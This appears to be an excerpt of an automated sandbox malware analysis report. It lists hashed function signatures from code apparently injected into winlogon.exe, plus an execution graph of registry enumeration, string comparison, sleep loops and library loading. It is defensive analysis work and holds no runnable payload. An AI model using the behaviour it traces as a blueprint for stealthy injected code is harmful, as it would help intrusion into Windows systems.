                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3422762182-91387939
                                                                                                      • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction ID: d8e2f81bdc39dd8a763d94b6984240439fbfc6f8a96d2e6f5b229b451e2667a0
                                                                                                      • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction Fuzzy Hash: 89F0893030878291EA60DB2BB9441B95665AB48FE1F044531DDD647B1ACF2CC4419300
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CombinePath
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3422762182-91387939
                                                                                                      • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction ID: a7f14f046b0015232b1d132be113cd593c54cbea7d7b46440bfabf247b709fce
                                                                                                      • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                                                                      • Instruction Fuzzy Hash: 9DF01234305B9292EA24CB63BD551B96661EB88FE1F089131DFDA47FA8DE2CC5458700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction ID: 0c135f359162b87c40b040ecf8e08eed3907e8d3640b5531d40964554bc2951c
                                                                                                      • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction Fuzzy Hash: 80F05E7132568291EFA4CB78F8843B967B4AB48BA3F44203A95CB46562CF3CC488C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                      • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction ID: 400815281f8fd3bd1b4bd73d528fb2581cd80e308cd8a9b4b68b37565725e693
                                                                                                      • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                                                                      • Instruction Fuzzy Hash: E8F0F471312A4691EF64CF70EC843F513A0AB887A1F441439D5CB86DA5DE2CC489C710
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                      • String ID:
                                                                                                      • API String ID: 1092925422-0
                                                                                                      • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction ID: 0feb9dddd18bffbd87194d378f9bbeb46ea8747d752cddb79e6c2150b894265a
                                                                                                      • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                                                                      • Instruction Fuzzy Hash: A2113C3A708B8282EB24DB6AF4442A9A6B4F748BA5F040039DED907796EF3DC504D700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual
                                                                                                      • String ID: NtQuerySystemInformation
                                                                                                      • API String ID: 2154932578-2549949336
                                                                                                      • Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction ID: 0894144dc5df0b21d97b2f4f6278bcabcfe2ded288764f170a645f21d5849889
                                                                                                      • Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction Fuzzy Hash: A9F0817221875182EB20CB2AF8403AA6765F789BE1F440134EECA47B44DF38C586CB04
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual
                                                                                                      • String ID: NtQuerySystemInformation
                                                                                                      • API String ID: 2154932578-2549949336
                                                                                                      • Opcode ID: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction ID: 4795f706462720542ee9b2df7de1db2341123beef952fac87932aa4eae4141b6
                                                                                                      • Opcode Fuzzy Hash: 74219aee19f4c8fff33bb8f441b5a8c4dce270eb6b270de61d52c61c6ba0a4a7
                                                                                                      • Instruction Fuzzy Hash: 48F03C76615B5282EB24CB25F8407BA63A1F7CDBA4F444134EECA97B94DF38C586CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 3168794593-0
                                                                                                      • Opcode ID: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction ID: 104b9d672af7b0a12060ccde14a28cfa905bd0ac1148ffacc10076ae75ea6854
                                                                                                      • Opcode Fuzzy Hash: f1983aadbafb302923b8fe7f482f9c632134a4f8d61b19ff0aa35b357364af3e
                                                                                                      • Instruction Fuzzy Hash: DA115A36516B89D6EB64DFAAA8442AA73A5F389F90F044029EBCA43B55DF3CC051C700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction ID: 23c1b7e45f70aab671c5e8511f78634cfbbe75f74747e26c5c1871c0ac006660
                                                                                                      • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction Fuzzy Hash: 1981DF3271865299FB70EB7998543FD26A8F748BA6F440236DECA53793DB36C442E310
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ConsoleErrorLastMode
                                                                                                      • String ID:
                                                                                                      • API String ID: 953036326-0
                                                                                                      • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction ID: 0352d528b6c8f269e5ccc78172830488205fd8a64a7a182c8b6a33ff2d050baa
                                                                                                      • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                                                                      • Instruction Fuzzy Hash: 0581BC32612A1299FB70DB758D503FD2AA0F784BA8F445536DECA57FE2DA34C842C714
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction ID: 9ccae65f76f946e0a5d058dda31765ef2638e92f9b8fe3c80c3b818d55abccb1
                                                                                                      • Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction Fuzzy Hash: 85112E32304F429AEB20CF74E8553A433A8F71DB69F041A31EAEE477A5DB38C1958340
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                      • String ID:
                                                                                                      • API String ID: 2933794660-0
                                                                                                      • Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction ID: a7114d53a6838eb99ecf4af792b034426132d3dd2562423eab34ecabcb5071ea
                                                                                                      • Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
                                                                                                      • Instruction Fuzzy Hash: 6D111832201B429AEB20CF70EC553B933A4F759768F041A31EAED87B94DB38D1A58380
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction ID: a2f142a994441ce1b315a3817b48307e0f5c4eea4e59c1d9023a818f1ae6f442
                                                                                                      • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction Fuzzy Hash: 2171B1362047C286E775DABD99843FA6795F74CBA6F44403ADECA43B8ADF34C6049701
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction ID: eb67bfe616382ca5e450c87514fb8753428d949155b60d1ed6f75a13b3fabdd4
                                                                                                      • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                                                                      • Instruction Fuzzy Hash: A471AF3221678286EB74DB3599543FAA791F785BA4F48003AEECA53FD9DF35CA048700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction ID: 29ba444ec149a436658b3a33bb87387c8e304e9762ecaf4f7308c61e6fc9f45a
                                                                                                      • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction Fuzzy Hash: 0C51A1323156828BEB64DF3DE444BA977A5F348BAAF508134DED64778ADB35E841C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Unwind
                                                                                                      • String ID: csm$f
                                                                                                      • API String ID: 3419175465-629598281
                                                                                                      • Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction ID: 7084505634da937256a8f27ac6debe493be642d8306f801c732bcc996970535c
                                                                                                      • Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
                                                                                                      • Instruction Fuzzy Hash: 7D518C3261A6028AEB24CB35EC44BE97795F384BA8F518134DAE647FC8DB79E841C700
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction ID: e80656745ce4937c6d43981e506399177344f0fcb98a132e0fc4c10f6c84c0bc
                                                                                                      • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction Fuzzy Hash: FD51C5326087C282E636DABD95543FEA795F3897A2F55403AEDCA03B9BCF35C4018B41
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileType
                                                                                                      • String ID: \\.\pipe\
                                                                                                      • API String ID: 3081899298-91387939
                                                                                                      • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction ID: 8343a926a68e06b2c81df7b96dc02fe71984818be82e8225ca1f847bc436c022
                                                                                                      • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                                                                      • Instruction Fuzzy Hash: B651F43220B78382E674DE79A5543FAA699F3857A0F444039CECA03FD9DF39E8018B40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction ID: e014aab257806e911d2217eadc77dde70f83a564810960c46194a027ce3203ef
                                                                                                      • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction Fuzzy Hash: A541B232319A8185EB20DF29E8443EA67A4F398BE5F404135EECE87B99DB3DC501CB40
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorFileLastWrite
                                                                                                      • String ID: U
                                                                                                      • API String ID: 442123175-4171548499
                                                                                                      • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction ID: fbc1901cd438fe050015c8f5b048eff89929c16979c3787b0623c9504132a890
                                                                                                      • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                                                                      • Instruction Fuzzy Hash: DB419F72216A8191EB20DF65E8443FAA7A0F7D87A4F404035EECE87B98EB38C541CB44
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction ID: 910eeaf10941734512f60460452778d40db5f270d29c1e26b833756a592517e9
                                                                                                      • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction Fuzzy Hash: F1111F32218B8182EB61CF29E4402A977A5F788BA9F584225DFCD0BB65DF3CD555CB00
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction ID: f7c407b3cb736b869750c279c4897b5659604303bb134e3bc3c21475f32ee55e
                                                                                                      • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                                                                      • Instruction Fuzzy Hash: 27110D3221AB8182EB618B25F8402A977E5F788BA8F184225DFDD07BA4DF3DD555CB00
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 756756679-0
                                                                                                      • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction ID: ff42e035ef30430dea2488309c725905cb3e6237a7a3f2154f28ae32bb7f7daf
                                                                                                      • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction Fuzzy Hash: 87218132704BC182EB21CF6DA4042AAF7B4FB88BA5F554125EECD47B26EF78C5428700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 756756679-0
                                                                                                      • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction ID: b2c8858c67d86593c067c296386619029cbc14546a3cfedbce96b29b6c8f8608
                                                                                                      • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                                                                      • Instruction Fuzzy Hash: 5B218336606B9185EB61CF69A4002FAF3A4FBC4BA4F054125EFCD87F95EE78C5528700
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12791215372.000001F6C8900000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C8900000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c8900000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617791916-0
                                                                                                      • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction ID: 15f102888c6a7d45419297a01f1ae9a5b5e1e3b04012511d416dfce55540dea1
                                                                                                      • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction Fuzzy Hash: 85E0C9B171160186E714DB7AD8143A9BAE5EB88B62F89C024C98907351DF7DC499D750
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000018.00000002.12789117032.000001F6C88A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F6C88A0000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_24_2_1f6c88a0000_winlogon.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 1617791916-0
                                                                                                      • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction ID: c21ecb1373d019ddf805e93b9c9dc80aa6e4b5facb562c68f45f8517f260b21c
                                                                                                      • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                                                                      • Instruction Fuzzy Hash: 4BE06DB1612601C6E714CF72DC043A93AE5FBC8F21F48C024CA8947750DF7D8599C740

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.3%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:300
                                                                                                      Total number of Limit Nodes:15
                                                                                                      execution_graph 14038 261ac901c28 14044 261ac901650 GetProcessHeap HeapAlloc 14038->14044 14040 261ac901c3e Sleep SleepEx 14042 261ac901c37 14040->14042 14042->14040 14043 261ac9015c0 StrCmpIW StrCmpW 14042->14043 14088 261ac9018dc 14042->14088 14043->14042 14106 261ac901274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14044->14106 14046 261ac901678 14107 261ac901274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14046->14107 14048 261ac901689 14108 261ac901274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14048->14108 14050 261ac901692 14109 261ac901274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14050->14109 14052 261ac90169b 14053 261ac9016b6 RegOpenKeyExW 14052->14053 14054 261ac9016e8 RegOpenKeyExW 14053->14054 14055 261ac9018ce 14053->14055 14056 261ac901711 14054->14056 14057 261ac901727 RegOpenKeyExW 14054->14057 14055->14042 14117 261ac9012c8 RegQueryInfoKeyW 14056->14117 14059 261ac901762 RegOpenKeyExW 14057->14059 14060 261ac90174b 14057->14060 14063 261ac901786 14059->14063 14064 261ac90179d RegOpenKeyExW 14059->14064 14110 261ac90104c RegQueryInfoKeyW 14060->14110 14066 261ac9012c8 16 API calls 14063->14066 14067 261ac9017c1 14064->14067 14068 261ac9017d8 RegOpenKeyExW 14064->14068 14071 261ac901793 RegCloseKey 14066->14071 14072 261ac9012c8 16 API calls 14067->14072 14069 261ac901813 RegOpenKeyExW 14068->14069 14070 261ac9017fc 14068->14070 14075 261ac901837 14069->14075 14076 261ac90184e RegOpenKeyExW 14069->14076 14074 261ac9012c8 16 API calls 14070->14074 14071->14064 14073 261ac9017ce RegCloseKey 14072->14073 14073->14068 14077 261ac901809 RegCloseKey 14074->14077 14078 261ac90104c 6 API calls 14075->14078 14079 261ac901872 14076->14079 14080 261ac901889 RegOpenKeyExW 14076->14080 14077->14069 14081 261ac901844 RegCloseKey 14078->14081 14082 261ac90104c 6 API calls 14079->14082 14083 261ac9018c4 RegCloseKey 14080->14083 14084 261ac9018ad 14080->14084 14081->14076 14085 261ac90187f RegCloseKey 14082->14085 14083->14055 14086 261ac90104c 6 API calls 14084->14086 14085->14080 14087 261ac9018ba RegCloseKey 14086->14087 14087->14083 14132 261ac9014b4 14088->14132 14106->14046 14107->14048 14108->14050 14109->14052 14111 261ac9011b5 RegCloseKey 14110->14111 14112 261ac9010b9 14110->14112 14111->14059 14112->14111 14113 261ac9010c7 RegEnumValueW 14112->14113 14115 261ac90111c 14113->14115 14114 261ac901149 GetProcessHeap HeapAlloc 14114->14115 14115->14111 14115->14113 14115->14114 14116 261ac90117f GetProcessHeap HeapFree 14115->14116 14116->14115 14118 261ac901334 GetProcessHeap HeapAlloc 14117->14118 14119 261ac901499 RegCloseKey 14117->14119 14120 261ac901485 GetProcessHeap HeapFree 14118->14120 14121 261ac90135d RegEnumValueW 14118->14121 14119->14057 14120->14119 14125 261ac9013af 14121->14125 14123 261ac9013dd GetProcessHeap HeapAlloc 14123->14125 14124 261ac90142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14124->14125 14125->14120 14125->14121 14125->14123 14125->14124 14126 261ac901413 GetProcessHeap HeapFree 14125->14126 14127 261ac901554 14125->14127 14126->14124 14128 261ac9015a4 14127->14128 14129 261ac90156e 14127->14129 14128->14125 14129->14128 14130 261ac901585 StrCmpIW 14129->14130 14131 261ac90158d StrCmpW 14129->14131 14130->14129 14131->14129 14133 261ac9014d1 GetProcessHeap HeapFree 14132->14133 14134 261ac9014f0 GetProcessHeap HeapFree 14132->14134 14133->14133 14133->14134 14135 261ac90150f 14134->14135 14135->14135 14136 261ac90152a GetProcessHeap HeapFree 14135->14136 14137 261ac8d2908 14138 261ac8d2936 14137->14138 14139 261ac8d2aa7 14138->14139 14140 261ac8d2a2b LoadLibraryA 14138->14140 14140->14138 14141 